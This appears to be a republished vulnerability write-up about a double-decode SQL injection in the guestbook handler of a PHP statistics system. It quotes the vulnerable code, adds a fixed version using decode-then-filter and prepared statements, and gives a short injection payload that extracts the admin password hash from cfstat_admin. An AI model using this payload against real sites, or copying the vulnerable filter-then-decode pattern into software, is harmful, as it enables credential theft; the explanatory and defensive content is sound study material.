Popular multi-user PHP Statistics System v4.0 Injection Vulnerability

Source: Internet
Author: User


Today, tired of reading, I downloaded this set of code.

Let's take a look at the author's description. It claims the system is completely protected against injection attacks and that passwords are stored as 32-character MD5 hashes.

Going by that, most injection attempts should be impossible, unless the developer has overlooked something.

However, there is a more common kind of vulnerability that was missed.

cf_do.php

Code:
// Leave a message
if ($action == "gbookaddsave")
{
    // Inputs are run through chkstr() first and only then through urldecode()
    $username = chkstr($_GET["username"], 1);
    $content  = HTMLSpecialChars(chkstr($_POST["content"], 1));
    $contact  = HTMLSpecialChars(chkstr($_POST["contact"], 1));
    $ly       = substr(urldecode(chkstr($_GET["ly"], 1)), 0, 255);
    $currweb  = substr(urldecode(chkstr($_GET["currweb"], 1)), 0, 255);

    if ($content == "") alertclose("Enter the message content");
    if ($contact == "") alertclose("Enter the contact information");

    // Duplicate check: same message from the same user on the same day
    $sql = "select count(*) from cfstat_gbook where username='$username' and content='$content' and contact='$contact' and TO_DAYS(NOW())-TO_DAYS(addtime)=0";
    $result = mysql_query($sql);
    $rs = mysql_fetch_array($result);
    if ($rs[0] > 0) alertclose("You have left the same message before!");

    // The decoded $ly and $currweb are concatenated straight into the statement
    $sql = "insert into cfstat_gbook (username, content, contact, ly, currweb, addtime) values
    ('$username', '$content', '$contact', '$ly', '$currweb', '" . date("Y-m-d H:i:s") . "')";
    mysql_query($sql);

    alertclose("message succeeded");
}


If you have read about "second" (double-decode) injection vulnerabilities before, this pattern should look familiar.
In the code above, the input is passed through chkstr filtering first and only then through urldecode. That ordering is what creates the vulnerability: a percent-encoded character passes the filter untouched and is decoded back into its original form afterwards, after the filtering has already happened.
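To make the ordering problem concrete, here is an added example (not code from the statistics system or from the original post). The chkstr() below is an assumed stand-in that simply escapes quotes, since the real implementation is not on the page; the three functions contrast the vulnerable order, the corrected order, and a parameterised query where the value never becomes part of the SQL text at all.

```php
<?php
// Added example, not the application's own code. chkstr() is an assumed
// stand-in for the application's filter: it escapes quotes and backslashes.
function chkstr(string $s): string
{
    return addslashes($s);
}

// Vulnerable order, as in cf_do.php: the filter sees the still-encoded input,
// so a percent-encoded quote (%27) passes through untouched and urldecode()
// turns it back into a bare quote inside the SQL string.
function build_vulnerable(string $raw): string
{
    $ly = substr(urldecode(chkstr($raw)), 0, 255);
    return "insert into cfstat_gbook (ly) values ('$ly')";
}

// Corrected order: decode first, then filter, so the filter operates on the
// final bytes that will actually reach the database.
function build_filtered(string $raw): string
{
    $ly = substr(chkstr(urldecode($raw)), 0, 255);
    return "insert into cfstat_gbook (ly) values ('$ly')";
}

// Better still: do not build SQL from strings. With a prepared statement the
// decoded value is sent as a parameter, whatever characters it contains.
function insert_with_pdo(PDO $db, string $raw): void
{
    $ly = substr(urldecode($raw), 0, 255);
    $stmt = $db->prepare('insert into cfstat_gbook (ly) values (:ly)');
    $stmt->execute([':ly' => $ly]);
}

// Constructed input: text containing a percent-encoded single quote.
$input = 'abc%27def';
echo "filter-then-decode: ", build_vulnerable($input), "\n";
echo "decode-then-filter: ", build_filtered($input), "\n";
```

Running the script shows the difference directly: in the first statement the decoded quote sits unescaped inside the SQL string, while in the second it arrives escaped because the filter saw the decoded byte. The PDO version is the one to actually ship; the corrected ordering only narrows the gap, whereas a parameterised query removes the concatenation that made the ordering matter in the first place.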

There is not much to say about finding this kind of bug; what matters more is how it can be used.

For the insert statement, the resulting SQL can be made to look like this:


Code:
insert into cfstat_gbook (username, content, contact, ly, currweb, addtime) values
(1111, 1111, 1111, SQL statement, (select pwd from cfstat_admin where id=1), 1111)%23 $currweb, '" . date("Y-m-d H:i:s") . "')


In general, we should fix not only the common vulnerabilities but also the many less conventional ones like this.
